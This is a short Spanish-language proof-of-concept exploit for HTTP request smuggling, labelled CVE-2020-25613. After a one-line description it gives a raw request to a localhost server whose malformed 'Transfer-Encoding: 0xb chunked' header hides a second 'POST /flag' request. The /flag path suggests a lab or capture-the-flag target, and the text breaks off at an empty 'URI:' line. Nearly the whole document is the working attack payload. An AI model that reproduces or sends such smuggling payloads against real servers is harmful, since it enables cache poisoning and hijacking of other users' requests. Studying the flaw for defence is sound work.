
Prueba de concepto de explotación para la vulnerabilidad de contrabando de solicitudes HTTP CVE-2020-25613, que demuestra una evasión en el análisis de la codificación de transferencia fragmentada para envenenar cachés y secuestrar solicitudes.
POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Type: text/html
Content-Length: 129
Connection: keep-alive
Transfer-Encoding: 0xb chunked
1
A
0
POST /flag HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 180
Connection: keep-alive
Content-Type: text/html
URI: